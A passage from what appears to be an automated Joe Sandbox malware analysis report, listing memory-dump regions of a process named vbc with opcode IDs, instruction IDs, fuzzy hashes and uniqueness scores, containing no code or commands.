                                                                              • Instruction Fuzzy Hash: AD11D376904384DFCB11CF10D5C4B16BF72FB94320F28C6A9D8084B656C33AE85ACBA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.640844260.000000000A100000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A100000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_a100000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ea9ee46d17629d0c90814ba04aeb14155de9d77af0946cab3e9709fb9de9448e
                                                                              • Instruction ID: b9ed9ab747da5929ac3574055574addbbbdd4d3c951d1a0790fe511380f543ad
                                                                              • Opcode Fuzzy Hash: ea9ee46d17629d0c90814ba04aeb14155de9d77af0946cab3e9709fb9de9448e
                                                                              • Instruction Fuzzy Hash: 94C1E470B1C219CFDF285F6989066BDBAB6BFC8710F1A8429D482E66D4CF748841DB61
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000002.00000002.636319256.00000000008D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008D0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_2_2_8d0000_vbc.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 720b211f074c436bf21536ab7835095f030e540c336126f612de04182abc2628
                                                                              • Instruction ID: db18f52b6097c011fb76759c7903b111691d8216ff3283cacb33d19623e0384e
                                                                              • Opcode Fuzzy Hash: 720b211f074c436bf21536ab7835095f030e540c336126f612de04182abc2628
                                                                              • Instruction Fuzzy Hash: 0D212A83C41E5887EF4526FB0CA43CE1381EB7BB79F409759C339803E1B94515878627
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%